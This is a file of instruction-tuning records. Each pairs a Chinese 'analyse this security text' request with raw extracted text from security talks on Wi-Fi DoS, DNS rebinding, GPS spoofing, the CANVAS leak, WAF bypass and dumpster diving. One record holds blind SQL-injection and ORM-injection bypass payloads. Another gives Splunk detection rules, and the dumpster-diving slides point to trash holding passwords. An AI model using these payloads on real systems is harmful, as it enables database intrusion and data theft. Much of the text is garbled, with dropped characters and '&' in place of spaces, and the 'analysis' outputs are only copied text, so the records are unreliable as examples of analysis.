{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSubmitted to DefCon16 Autoimmunity Disorder in Wireless LANs By Md Sohail Ahmad J V R Murthy, Amit Vartak AirTight Networks Submitted to DefCon16 Disclaimer & About Us We are no medical doctors  our only competency is coffee drinking. The last year we brought to you Café Latte with free topping of cracked WEP. This year wed like to share with you rather interesting observations about Wireless LAN behavior  some of which have an interesting parallel with a previously known disorder in medical science. Submitted to DefCon16 What has Autoimmunity disorder got to do with Wireless LANs? 1 Submitted to DefCon16 Autoimmunity Disorder An autoimmune disorder is a condition that occurs when the immune system mistakenly attacks and destroys healthy body cell. Submitted to DefCon16 Why it Caught Our Attention? An autoimmune disorder is a condition that occurs when the immune system mistakenly attacks and destroys healthy body cell (or client). Submitted to DefCon16 Over many late night coding and debugging sessions, we spotted .. An autoimmune disorder is a condition that occurs when an Access Point mistakenly attacks and destroys authorized body cell (or client). Not just one.. we spotted many instances of this interesting, self-destructive behavior! Submitted to DefCon16 So What? Our findings suggest that new avenues for launching DoS attacks are possible. Majority of vulnerabilities reported here are implementation dependent and are found to exist in select open source AP and commercial Access Point S/W. MFP(11w) is also vulnerable to DoS attacks! Submitted to DefCon16 Background 2 Submitted to DefCon16 Whats Well Known -- DoS from an External Source It is well known that by sending spoofed De-authentication or Dis- association packets it is possible to break AP to client connections. A De-authentication packet spoofed with source address = AP MAC address causes disconnection in clients state machine. Likewise, a De-authentication packet spoofed with source address = Client ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlack Ops 2007: Design Reviewing The Web Dan Kaminsky Director of Penetration Testing IOActive Inc. Three Interesting Things  Slirpie: Come to my website, be my VPN  P0wf: Automagically discovering the toolkits behind the web  LudiVu: Pretty Intro to Slirpie: Dependence And Otherwise  The fundamental design of the web is late binding  pieces are pulled together and assembled at runtime, independently from one another  As soon as independence was established, people wanted to be able to create dependencies  You read my page, I read your mail  Could be problematic  The Same Origin Policy  Basic concept  Independent resources (images, self-contained iframes, etc) can load across security domains  Dependent resources (scripts, etc) can only be dependent on eachother when theyre hosted from the same origin  A page can read from an iframe it gives you, but not an iframe Hotmail gives you The Obvious Bug  Content does not come from names  Content comes from addresses  DNS provides the name to address mapping  The presumption was that this mapping would stay the same  Wrong DNS Pinning  Swapping around the DNS address (DNS Rebinding) has been known for years  DNS Pinning, implemented in browsers, has attempted to lock the browser to one particular address  Old attack, old defense, nobody checked to see if it still workeduntil recently  RSnake  Dan Boneh from Stanford New Era of DNS Rebinding Attacks  Browsers only try to pin DNS  they fail open rather than closed  More reliable that way  The real problem is plugins, which can make connections of their own  Plugins dont share the pin cache with the browser  can load the applet from one address and deliver traffic to another Plug and Play  What did RSnake and Dan Bonehs team find?  Browser itself will provide arbitrary HTTP  XMLHTTPRequest provides crippled TCP  Flash9 provides arbitrary TCP sockets  Java provides arbitrary TCP and UDP sockets  Everythings supposed to be bound to the site that provided the applet  Doesnt work", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTime Turner Hacking RF Attendance Systems (To Be in Two Places at Once) DEMO 1 ? ? ? Jacob Glueck Ammar Askar Aaron Wisner Charles Cao Prof. Bruce Land (Advisor) Cole Smith https://github.com/wizard97/iSkipper https://github.com/charlescao460/iSkipper-Software (Transposition Cipher) (Transposition Cipher) Device ID Checksum: 8F941803 0x8F  0x94  0x18 = 0x03 https://github.com/VCNinc/Time-Turner https://github.com/VCNinc/Time-Turner DEMO 2 DEMO 3 Time Turner Protocol 1. Remain idle until the class is about to begin 2. Turn on and start emulating both a remote and a base station 3. Wait until device overhears a burst of radio traffic 4. Determine most popular student response using base station emulator 5. Broadcast most popular response from remote emulator 6. Repeat 2-5 until the expected end time of the class DEMO 4 DEMO 5 DEMO 6 Authentication Authentication An authentication mechanism can be: Authentication An authentication mechanism can be: 1. Something you know (eg. passwords) Authentication An authentication mechanism can be: 1. Something you know (eg. passwords) 2. Something you have (eg. U2F keys) Authentication An authentication mechanism can be: 1. Something you know (eg. passwords) 2. Something you have (eg. U2F keys) 3. Something you are (eg. biometrics) Authentication An authentication mechanism can be: 1. Something you know (eg. passwords) 2. Something you have (eg. U2F keys) 3. Something you are (eg. biometrics) 4. Polling devices??? Kerckhoffs's Principle A system should be secure even if everything except the key is public knowledge. Kerckhoffs's Principle A system should be secure even if everything except the key is public knowledge. Kerckhoffs's Principle A system should be secure even if everything except the key is public knowledge. CIA Properties CIA Properties  Confidentiality CIA Properties  Confidentiality  Integrity CIA Properties  Confidentiality  Integrity  Availability CIA Properties  Confidentiality  Integrity  Availability CIA Properties  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nkernel32 export redirection 暂时忽略模式穿越细节知识 kernel32 IsProcessCritical api-ms-win-core-processthreads-l1-1-2.IsProcessCritical kernelbase!IsProcessCritical NtQueryInformationProcess_0x1d_29 ntoskrnl NtQueryInformationProcess真实实现体 IsProcessCritical 关于Critical Process基本情况参阅msdn https://devblogs.microsoft.com/oldnewthing/20180216-00/?p=98035 这里仅记录下逆向该API的过程 从kernel32跟到 api-ms-win-core-processthreads-l1-1-2.dll 仅在 .rdata段显示了字符串 又指向了 kernel32 参考: https://twitter.com/MiasmRe/status/1270277962873610243 可以发现在api-ms-win-core-processthreads-l1-1-2.dll内 没有该API的 描述apiSet详细信息 只提供了名称 然后由 apisetschema.dll (该函数只导出了 anSi)进行处理 https://blog.quarkslab.com/runtime-dll-name-resolution-apisetschema-part-i.html apiset mechnisam 这种dll只是为了保持兼容性做到一个临时中转也就是说该dll也是一个包装器一样的概念没有 实际代码它的导入表项是空的再将每个不同的版本增删API在这里过滤最后转到一个 一定会调用的函数内部 我们知道kerenl32里面有很多API 都走了 kernelbase.dll 例如CreateFileStub 随着版本升级如果不考虑任何因素势必会导致kernelbase.dll越来越臃肿 The problem is that, with this re-factoring, a single DLL might contain multiple logical sets of APIs 因此微软重新设计了 dll架构 根据微软的dll架构设计很明显 Virtual DLL就是平时直接接触的dll kernel32,user32等 ApiSetSchema是一种机制 依赖于 apisetschema.dll 然后+ api-set兼容性dll LogicalDll 只得是真正实现函数代码的动态链接库 因此我们需要分析的是 kernelbase.dll!IsProcessCritical apisetschema apisetschema机制在早期引导阶段被激活 Winload.exe在引导期间加载 Winload!OslpLoadAllModules Winload!OsLoadImage nt!MiInitializeApiSets 第二部分 https://blog.quarkslab.com/runtime-dll-name-resolution-apisetschema-part-ii.html 介绍 ApiSetSchema的结构 kernelbase 现在才算进入正题 uf一下 ApiSetMapLoad.py: Extracts the content of the .apisetmap section (from apisetschema.dll) to a file. ApiSetMapParse.py: Parses the content of the .apisetmap section. SearchFiles.py: Search for all Virtual DLL files on a system. out_parsingapiset.txt: An output example of ApiSetMapParse.py executed on Windows 8 Consumer Preview 32-bit. win7_64_names.txt: output from SearchFiles.py on Windows 7 SP1 64-bit. win8_32_CP_names.txt: output from SearchFiles.py on Windows 8 Consumer Preview 32-bit. 作者介绍了ApiSetSchema的结构并提供了 python脚本备份地址: ht", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhos&this&guy&  10&years&on&the&defensive&side&  File&analysis&&&RE&  Recently&doing&research&using&Machine& Learning& Level&Se?ng&  &ROP&  Technique&to&bypass&nonFexecutable&memory&  Bounce&around&in&memory&execuJng&small& gadgets&that&typically&end&with&a&return& instrucJon&  PIN&  Pin&is&a&dynamic&binary&instrumentaJon& framework&for&the&x86&and&x86F64&  Does&not&require&recompiling&of&source&&&&&&&&&&&& code&and&can&support&instrumenJng&&&&&&&&&& programs&that&dynamically&generate&code& Basic&Idea&  A&whitelist&for&offsets&that&can&be&a&&&&&&&&&&&& target&of&indirect&branch&or&ret&  We&know&valid&targets&for&calls&and&rets&  FuncJons&  InstrucJons&aUer&call&instrucJon&  If&an&indirect&call&or&a&ret&goes&to&a&&&&&&&&&&&&&&&&&&&&&&&& different&locaJon,&then&ROP&  Store&the&offset&to&these&locaJons& How&Do&We&Get&Those?&  BranchTargetDetector&pintool&  When&DLL&is&loaded,&exported&funcJons&are& analyzed&  All&calls&and&returns&are&instrumented&&&&&&&&&&&&& as&well&  Great&because&we&get&actual&values&  Not&so&great&because&you&only&get&&&&&&&&&&&& values&from&funcJons&pin&can&detect&&&&&&&&&&&& and&what&it&actually&executes& BranchTargetDetector&  Pros&  We&get&real,&actual&used&values&  Cons&  Not&the&fastest&thing&  Only&get&values&from&funcJons&pin&can&&&&&&&&&&& detect&and&what&it&actually&executes&  If&DLL&isnt&loaded,&you&dont&get&data&&&&&&&&&&&&&&&&&&& for&it& How&Else&Can&We&Get&Those?&  pyew&  Much&be\\er&at&detecJng&funcJons&  Can&bulk&run&all&DLLs& Have&Data,&Now&What?&  Store&offsets&in&file&by&md5&hash&of&dll&  Allows&for&handling&of&different&versions&of&the& same&dll& ROPDetector&  When&a&DLL&is&loaded,&load&the&white&list&for& that&DLL&  Instrument&all&indirect&calls&and&RETs&and&alert& when&target&is&not&on&the&white&list& Example&1&  Adobe&Reader&9.3&on&Windows&XP&  32dbd816b0b08878bd332eee299bbec4&  CVEF2010F2883&  StackFbased&buffer&overflow&in&CoolType.dll& DetecJon!& C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\icucnv36.dll 0x4a80cb3f: ret Target: 0x4a82a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUsing GPS Spoofing to Control Time Dave/Karit (@nzkarit)  ZX Security Defcon 2017 www.zxsecurity.co.nz @nzkarit Draft for Defcon Media server A final copy will be posted on https://zxsecurity.co.nz/events.html after the talk is given Draft 2 www.zxsecurity.co.nz @nzkarit Dave, Karit, @nzkarit Security Consultant/Pen Tester at ZX Security in Wellington, NZ Enjoy radio stuff Pick Locks and other physical stuff at Locksport whoami 3 www.zxsecurity.co.nz @nzkarit 4 www.zxsecurity.co.nz @nzkarit GPS (Global Positioning System) GPS Spoofing on the cheap Lets change the time! So what? Serial Data Pulse Per Second (PPS) How we can detect spoofing Today 5 www.zxsecurity.co.nz @nzkarit Tells us where we are Tells us the time GPS 6 www.zxsecurity.co.nz @nzkarit Anyone in the room not currently trust GPS locations? Anyone in the room not currently trust GPS time? Anyone feel that this will change by the end of the talk? We Trust GPS Right? Right????? 7 www.zxsecurity.co.nz @nzkarit GPS too important to life? GPS must be great and robust? Right? Important services rely on it: Uber Tinder You have to trust it right? 8 www.zxsecurity.co.nz @nzkarit NTP Time Source Plane Location Ship Location Tracking Armoured Vans Taxi law in NZ no longer knowledge requirement And some other things as well 9 www.zxsecurity.co.nz @nzkarit So why dont I trust it? 10 www.zxsecurity.co.nz @nzkarit Have GPS jammers to mess with Uber Black Cabs in London 11 www.zxsecurity.co.nz @nzkarit Jammers Boring 12 www.zxsecurity.co.nz @nzkarit Nation State 13 www.zxsecurity.co.nz @nzkarit A University 14 www.zxsecurity.co.nz @nzkarit The Chinese are in the NTPs 15 www.zxsecurity.co.nz @nzkarit Now we are talking 16 www.zxsecurity.co.nz @nzkarit A box An SDR with TX I used a BladeRF HackRF USRP So less US$500 in hardware Also some aluminium foil to make a Faraday Cage So it is now party trick simple and cheap This is the big game changer from the past What we need 17 www.zxsecurity.co.nz @nzkarit Setup 18 www.zxs", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Chasing Your Tail With A Raspberry Pi Matt Edmondson #BHUSA @BlackHatEvents Information Classification: General Why Are We Talking About This?  For some people, trying to figure out if theyre being followed is a matter of physical safety for themselves or others  I was approached by a friend in this situation looking for a technical option to use in conjunction with traditional tradecraft #BHUSA @BlackHatEvents Information Classification: General The New (i.e. Really Old) SDR: Surveillance Detection Route #BHUSA @BlackHatEvents Information Classification: General One Option: Looking for Persistent Digital Signatures  Go to Starbucks to grab a drink  Hit the gas station to top off the tank  Head over to the bookstore to look at magazines  Now Did I see any devices at all three locations? #BHUSA @BlackHatEvents Information Classification: General One Option: Looking for Persistent Digital Signatures Cont.  Well accomplish this by passively detecting Wi-Fi and Bluetooth devices we observe around us  The devices could be part of an active connection, or just looking for networks to connect to #BHUSA @BlackHatEvents Information Classification: General Hardware  For hardware I wanted to use things that I had laying around in a closet  I imagine many of you have these same things gathering dust somewhere and if not, theyre cheap #BHUSA @BlackHatEvents Information Classification: General Platform: Raspberry Pi is One Cheap Option #BHUSA @BlackHatEvents Information Classification: General Wireless: Something You Can Put In Monitor Mode #BHUSA @BlackHatEvents Information Classification: General Power: A Battery Pack or Other Power Source #BHUSA @BlackHatEvents Information Classification: General Display: A Screen For Real Time Monitoring #BHUSA @BlackHatEvents Information Classification: General Software: Kismet  Open source with a fantastic Discord server  Easy to install  Passive  Supports Wi-Fi, Bluetooth, SDR, ZigBee etc.  Writes the data into a SQL", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1119-win-自动收集 ## 来自ATT&CK的描述 一旦在系统或网络中建立立足点攻击者就可以使用自动化技术来收集内部数执行此技术的方法可以包括使用命令和脚本解释器来搜索和复制适合标准的信息指符合攻击者收集的数据例如在特定时间间隔的文件类型位置或名称此功能也可以内置到远程访问工具中 该技术可以结合使用其他技术例如文件和目录发现以及横向工具传输以识别和移动文件 ## 测试案例 暂无可参考相关自动化收集powershell脚本 ## 检测日志 Windows安全日志sysmon日志 ## 测试复现 暂无可参考相关自动化收集powershell脚本 ## 测试留痕 暂无 ## 检测规则/思路 ### splunk规则 根据所使用的方法操作可能包括批处理文件或脚本中命令行界面上的公用文件系统命令和参数取决于系统和网络环境类似的一系列操作可能会很不正常自动收集可能会与其他技术例如数据暂存一起发生这样文件访问监视显示了执行顺序文件打开的异常过程并且有可能一次将动作复制到多个文件的文件系统上的另一个位置这可能表示自动收集行为具有内置功能的远程访问工具可以直接与Windows API交互以收集数据也可以通过Windows系统管理工具例如Windows Management Instrumentation和PowerShell来获取数据 ```yml index=windows source=WinEventLog:Microsoft-Windows-Sysmon/Operational (EventCode=1 Image=*\\\\findstr.exe CommandLine=*/e*) //findstr used to search for a specefic file extension index=windows SourceName=Microsoft-Windows-PowerShell Message=*get-childitem* //search for specefic file with get-childitem in powershell index=windows SourceName=Microsoft-Windows-PowerShell Message=*Get-ChildItem -Recurse * //search for specefic file recursivly with get-childitem in powershell index=windows SourceName=Microsoft-Windows-PowerShell Message=*Get-Service* //get service information with powershell index=windows SourceName=Microsoft-Windows-PowerShell Message=*Get-process* //get process information with powershell index=windows source=WinEventLog:Microsoft-Windows-Sysmon/Operational (EventCode=1 Image=*\\\\sc.exe CommandLine=*query*) //get service list with sc.exe index=windows source=WinEventLog:Microsoft-Windows-Sysmon/Operational (EventCode=1 Image=*\\\\wmic.exe CommandLine=*Process list*) //get process list with wmic.exe index=windows source=WinEventLog:Microsoft-Windows-Sysmon/Operational (EventCode=1 Image=*\\\\wmic.exe CommandLine=*service list*) //get service list with wmic.exe ``` ### 建议 如果你对windows以及powershell比较了解的话你可以使用Windows日志以及powershell日志来完成监视检测当然最好的方法是使用Sysmon日志 ## 相关TIP [[T1119-win-Seatbelt自动收集信息]] ## 参考推荐 MITRE-ATT&CK-T1119 <https://attack.mitre.org/techniques/T1119/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBuilding a Real Session Layer These slides are unfortunately, of little use. Please see updated materials at fived.capelis.dj. Please allow me to introduce myself I'm me. There. Introduction Done! Let's start at the beginning (Everyone knows this part... but just let me quickly go through it.) What's a Session Layer? ISO 7 Layer Model (Designed by committee) 1  Physical Layer (e.g. Cat 6, Fiber, Air) 2  Data Link Layer (e.g. Ethernet, 802.11[abgns...], FDDI) 3  Network Layer (Most commonly IP) 4  Transport Layer (e.g. TCP, UDP and a bunch of others) 5  Session Layer (Mostly unused) 6  Presentation Layer (Even more unused) 7  Application Layer (Everything) So where's the application layer? It kinda went everywhere.... (ewww... TWSS?) Encryption: SSL, SSH, IPSec (?) Authentication: Network services shouldn't have to ask. See also: I want to use my SSH keys for everything and there's no good reason I shouldn't be able to! Tons of service specific stuff that got pushed into the application layer Generally each application is reimplementing some idea of a session independently. More Code. More Code. More Buggy Code. So let's get rid of that while we're here. Why do application multiplexing in layer 4? I dunno. Yoink Layer five'd Speaking of which... That's what we're calling this software. fived Short for: Layer Five Daemon Here's what we're going to put into fived: Application Multiplexing Authentication Encryption Things that go away: Port Numbers Port Knocking Host Based Firewalls Authentication (Sometimes) ... Really? Yes... really. No port numbers Please do one of the following If you're not with me on this... shout an expletive If you're with me on this... loudly proclaim: Hmm... interesting Best thing about Defcon: Having hundreds of people swear at you. Moving on! So let's take this slowly, in the order of most surprising to least No port numbers Precedence! Portmapper Do the same thing DNS did for IP addresses with port numbers (What about SRV records?) (Well...", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n以蓝军视跟踪和分析CANVAS攻击框架泄露事件 全共2605字阅读约需要5分钟 33绿盟科技研究团队在对络安全事件舆情监控中发现著名的商业渗透框架CANVAS系统源代码发泄露 绿盟科技M01N蓝军研究团队第时间对该事件进了跟踪快速分析了CANVAS的攻击框架所涉及的漏洞和技 术细节 Immunity CANVAS是套受信任的商业安全评估攻击框架每都会发布稳定版本它允许专业员进渗透测 试和对模拟攻击此次CANVAS的泄露版本为7.26期为2020年9包含1000+个漏洞利代码使 CANVAS成功攻陷系统后攻击者可以抓取屏幕截图转储密码凭据操纵标件系统并提升特权并且可以在 标系统和标整个络区域之间隐蔽连接另外值得注意的是其中包含Spectre CPU漏洞的可EXP漏洞利 模块 CANVAS由Immunity开发该公司由前NSA客Dave Aitel创然后于2019年出售给CyxteraTechnologies 1 CANVAS的框架及主体功能 CANVAS框架主体及模块均使python开发持跨平台安装使包括Windows, Linux和MacOSX等, 提供了 GUI和命令来进操作使框架所有功能模块如下 绿盟君 绿盟科技 昨天 CANVAS主要以漏洞利为主其功能完整持攻击链命周期包括C&C权限提升权限维持凭证获取横 向移动防御规避信息收集隐蔽隧道及部分域林攻击功能框架设计以资产节点式进攻击过程控制和记 录各节点的远程及本地攻击操作具备完善的攻击志记录 远程漏洞利横向移动及C&C功能复现 成功执DCSync在测试环境获取AD靶机户的密码Hash 同时CANVAS作为款成熟的商业安全评估攻击框架具有动化成安全评估报告的功能并且报告拥有良好的 可阅读性 2 漏洞利模块 1 漏洞利模块分析 本次泄漏的CANVAS框架源码除带漏洞利模块外还包含两第三漏洞利模块经统计含有CVE编号的 漏洞共计929个框架带漏洞利库中包括617个漏洞第三漏洞利库包含333个漏洞官上针对控设备 的漏洞利包Gleg在本次泄漏中未涉及 这些漏洞模块在CANVAS中根据利的致分为四类分别针对不同的攻击场景与标 2 第个针对Spectre CPU漏洞的可利EXP 先我们回顾下CVE-2017-5715 Spectre CPU漏洞该漏洞是IntelAMD和ARM处理器体系结构中的硬件设计 缺陷它允许运在同系统上的不良应程序中的代码破坏不同应程序的CPU级别之间的隔离然后从其他应 程序中窃取敏感数据它和Meltdown漏洞的发现被认为是现代CPU演进和历史上的程碑有效地迫使了 CPU供应商重新考虑他们设计处理器的法从明确表明他们不能只专注于性能损害了数据安全性 Spectre漏洞从2017年被公开开始研究员对外公开的均为害的POC代码也直没有发现有被在野攻击利 的证据 2021年2国外安全研究员Voisin发现VirusTotal上的份Linux Spectre漏洞EXP代码可以转储/etc/shadow的 内容近在Dave Aitel的条推中前Immunity席执官似乎证实了Voisin的发现确实是他的前公司在 2018年2宣传的CANVAS Spectre模块 当然我们也确认了本次泄露的CANVAS版本确实含有Spectre漏洞EXP插件及代码代码备注该EXP代码实现在 2018年3完成 3 其他重要功能模块 1 MOSDEF后 MOSDEF后是CANVAS在命令控制环节的主要模块其持主流操作系统对于些较冷的处理器架构亦 有较完善的持 以防御规避技术研究与攻击检测的视来看MOSDEF具有基本的杀软规避功能持采DNS等较隐蔽的通信 式具有定防御规避的能其采的持久化技术等较为常所成的payload类型并不多但其成的 些载荷件在VirusTotal等平台仍具有较好的免杀效果 根据VirusTotal检测结果默认成的Windows x86 版本MOSDEF可执件载荷的检出率相对可观 Powershell版MOSDEF具有命令执件上传执shellocode等攻击功能在VisualTotal中具有较低的检 出率 2 RootKit模块 CANVAS带windows与linux系统的rootkit模块其中windows系统仅有物理内存dump的功能linux系统中的 rootkit功能要丰富的多linux平台的rootkit模块以源码的形式分发每次使需要针对标的内核版本进重新编 译内核模块持以下功能 1. 指定名称的件隐藏 2. 后进程及进程PID隐藏 3. TCP通讯隐藏 4. MOSDEF连接后 利CANVAS带的rootkit模块攻击者可以实现持久化与攻击为隐藏增加防守与溯源难度 3 VisualSploit可视化代码成具 泄漏CANVAS包含名为VisualSploit的可视", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n众测困住你的那些问题 jkgh006 | 众测资深玩家多家众测平台TOP白帽 前 言 安全趋势的发展现在已经变成三大阵容一个是代表过去的传统漏洞平台第二个是以乙方为 首的众测平台以及以甲方主导的SRC平台  传统的漏洞平台慢慢的淡出视野现在最火的莫过于 SRC和众测所有的类型终将归为一种方法所以对于其中众测也是有一套方法论怎么分析怎 么去绕怎么去获取证据等等都是有章可循我们重点关注众测困住你的那些问题 目录 01 拦截框架下注入的过程拆解 02 基于三方调用框架分析利用 03 趣味的SESSION和EXCEL 01 拦截框架下注入的过程拆解 越来越多的web系统随着运维方安全意识的提高网络设备的投入 以及安全编码规范的介入漏洞的发现从过去的简单粗暴到现在举步 维艰怎么去判断漏洞的存在进而根据漏洞获取证据数据这个是个 众测平台选手的痛点 1 拦截框架下注入的过程拆解 1.WAF产品的原理 2.全局过WAF的几个思考点 3.漏洞层面的过WAF 层层递进分析WAF求证据 1.判断性SQL语句的形式 2.条件判断函数方法分析 3.通用型判断SQL语句对比 数据库层面基础铺垫 1.基于JPQL类型的绕过分析 2.基于Hibernate类型的绕过分析 框架层的语句分析 if(1=(select 1 REGEXP if(1=1,1,0x00)),1,1)=1 IFNULL(ascii(substr(user(),1,1))/(114%ascii(substr (user(),1,1))),'yes) IFNULL(hex(substr(user(),1,1))/(114%hex(substr(u ser(),1,1))),'yes) IFNULL(1/(locate(substr(user(),1,1),'r')),'yes) IFNULL(1/(locate(right(left(lower(user()),1),1),'r')),' yes) left(user(),1)=\"r\"; if(1=1,1,1) NVL(TO_CHAR(DBMS_XMLGEN.getxml('sele ct 1 from dual where 1337>1')),'1')!=1 NVL2(NULLIF(substr('abc',1,1),'ca'),1,2)=1 INSTR('abcd','b', 2, 1)>0 2018-10-21- decode(1,21,1,to_date(decode(1,1,'','s'),'yyyy -mm-dd'))- to_date(decode(substr(user,1,1),'a','','s'),'yyy y-mm-dd)) decode(sign(INSTR(USER,'A', 2, 1)),0,to_number('x'),1) PATINDEX('Wa%25', 'Washington')>0 right(left(lower('abc'),1),1)='a isnull(nullif(substring('abc',1,1),'a'),'c')='c' regexp_like(1,(case when 1=1 then 1 else 0x00 end)) 1 数据库层面基础铺垫-条件判断函数方法分析 云模式只需将网 站的DNS解析到 WEB防火墙就 可以开始服务 Web防火墙 从waf的拦截机理我们可以分 为两种模式的绕过 1.全局性质的绕过 2.漏洞从面的绕过 1 层层递进分析WAF求证据-WAF产品的原理 a.畸形包绕过b.正向数据绕过 1.从原理上讲数据流过waf也就是经过网络设备再到后台的 web容器这里面存在很多兼容差问题比如国内传统的waf 网络层解析通过nginx做的如果web部署在weblogic或者 tomcat上因为后者都有容错性处理所以可以解析畸形包 但是在nginx曾解析不了从而放过处理达到全局绕过 2.所谓正向数据就是说数据包本身是一个正常的没有进行畸 形构造是过了waf的黑白名单等配置型漏洞如果 HTTP/1.0再比如构造假multipart数据配合GET绕过阿里云等 等 1 层层递进分析WAF求证据-全局过WAF的几个思考点 ORM注入 数字类型 JPQL  SELECT e FROM user e WHERE e.id = SQL('(select 1 from dual where 1=1)) and SQL('(SELECT 1)=1) 字符类型JPQL 通常指的是类似hibernate一类具有安全语法检测的注入 1 框架层的语句分析-基于JPQL类型的绕过分析 ORM注入 数字类型 Hibernate ORM  test\\'' or 1<length((select ver", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKinectASploit What if you took a kinect KinectASploit Used it's skeleton tracking feature: KinectASploit Sprinkled in some hacking tools: KinectASploit And combined them with a 3D Game Engine: Lets find out! Come see the Demo at Defcon19 and look for the tool source at: http://p0wnlabs.com/defcon19 Any graphics that look good were probably found on wallbase.net/4chan. Bad Code by jeff bryner p0wnlabs.com Use @ your own risk", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWelcome to BlueHat Shanghai Eric Doerr General Manager, Microsoft Security Response Center @edoerr May 30, 2019 Chinese researchers were the most prolific and high-impact contributors to the Microsoft Bounty Program in 2019 Growth 57% China-based bounty participants 46% China-based bounty submissions 2018 vs 2019 Impact China, 48% Global, 52% BOUNTY AWARDS China, 22% Global, 78% BOUNTY-ELIGIBLE SUBMISSIONS 2018 vs 2019 Focus 2019 Submissions by Vulnerability Type Memory Safety Issues 56% Information Disclosure 15% Microsoft Bounty Programs Microsoft Office Insider Microsoft .NET Core and ASP.Net Core Microsoft Edge Azure DevOps Microsoft Cloud Bounty Windows Defender Application Guard Windows Insider Preview Microsoft Identity Mitigation Bypass and Defense Microsoft Hyper-V Microsoft Office Insider Microsoft .NET Core and ASP.Net Core Microsoft Edge +75% of submissions Azure DevOps Microsoft Cloud Bounty Windows Defender Application Guard Windows Insider Preview +40% of submissions Microsoft Identity Mitigation Bypass and Defense Microsoft Hyper-V +50% of submissions Microsoft Bounty Programs 9 Our thanks China-based researchers and partner companies have demonstrated their skill and helped us secure customers and the broader ecosystem in 2019. A little history Long history of security investment 90s through 2010 1998 MSRC begins 2002 Bill Gates Trustworthy Computing Memo 2003 Buffer Overrun Protection in Visual Studio Windows Defender for XP and Server 2003 2004 Security Development Lifecycle (SDL) Data Execution Protection (DEP) releases in XP SP2 2005 First BlueHat 2006 BitLocker ships with Windows Vista 2007 Address Space Layout Randomization (ASLR) ships in Vista 2009 AppLocker ships with Windows 7 Long history of security investment 2010 through today 2013 Microsoft launches first Bug Bounty Digital Crimes Unit Cybercrime center opens 2014 Control Flow Guard (CFG) released in Windows 8.1 2015 Office ATP (Advanced Threat Protection) released Microsoft Advanced ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Unknown - Aboard boat Category: Net ## Description > That was close! The armed guard didnt notice you. The floor shakes, the boat is leaving the harbor. You are trying to stay hidden. You see two guards coming your way, you sneak into a small scrubber, they pass it, but then one of the guards takes out his phone and says OK Google and your phone suddenly makes a noise: PLING! The guards heard it: Guard 1: \"Did you hear that?\" Guard 2: \"It must have come from the scrubber\" Guard 1: \"Let's have a look!\" The guards close in, you are trapped! Suddenly a bell rings in the distance, and a voice talks through speakers: \"Every man to their positions, the ship is about to debark, I repeat, every man to their positions.\" The guards change their course and head for their positions. Pheww, that was close! You find a better place to hide and settle in for the journey. Then you notice an ethernet socket in the wall. Might as well sniff some traffic while you're here. > > Challenge: Noise on the wire (net) > > You connect your laptop to the ethernet socket and start wireshark. It taks a while before something interesting pops up - perhaps the crew as busy with whatever is that they normally do. You look through the packets, and hey, these look pretty interesting... A network capture was attached. ## Solution An overview of the network capture: ```console (user@kali)-[/media/sf_CTFs/google/13_Unknown_-_Aboard_boat/download] $ tshark -qz io,phs -r httponly.pcap =================================================================== Protocol Hierarchy Statistics Filter: eth frames:54 bytes:12435 ip frames:54 bytes:12435 tcp frames:54 bytes:12435 http frames:8 bytes:4583 media frames:1 bytes:546 data-text-lines frames:2 bytes:1759 tcp.segments frames:1 bytes:1306 websocket frames:8 bytes:1324 data-text-lines frames:8 bytes:1324 =================================================================== ``` Scanning through the TCP streams, we see the following interesting results: ```console (u", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhat is it?  Why do it?  Who does it?  Dark Clothing - Black. - Dark Blue.  No Flashy Logos - Nothing that will single you out. - Nothing Large. - If you must have logos, support your police.  Footwear - Thick Soles. - Hiking Boots. - Combat Boots. - Dr. Marten Style.  Disposable - Old clothes. - Thick Pants. - Whats Disposable? Stuff you wouldnt mind getting puke on.  Flashlights - Mag-Lite. - Military Style. - Compact. - Headlamps?  Trunk Space  A Duffle Bag  A Large Stick  Cardboard Boxes  Common Sense  Leave it as it was.  Dont make a mess.  Keep your flashlight _below the rim.  Use handles when _possible.  Dont just dive in.  Going Solo?  Do Not Run!!!  Apologize for making _them stop.  Talk to them.  Do not allow them to _search your car.  What to say \"I Know my Civil Liberties, and I don't believe I have done anything wrong, therefore I don't think it is necessary -- John Hoffman; The Art and Science of Dumpster Diving  Computer Repair Shops  Electronics Stores  Car Audio Shops  Cellular Suppliers  Satellite Stores  Flower Shops  Book Stores  Business Complexes  Industrial Areas  Often Overlooked. / Rarely Shredded.  Easy to See.  Account Names and Passwords, Phone Numbers, Meetings, Important Dates.  Riding the Fine Line  Identity Theft  Industrial Espionage  What can you do about it?  Benefits of Shredding  Shredding Services  Wipe All Magnetic Media  Security Policies", "category": "text_analysis", "source": "security_papers"}
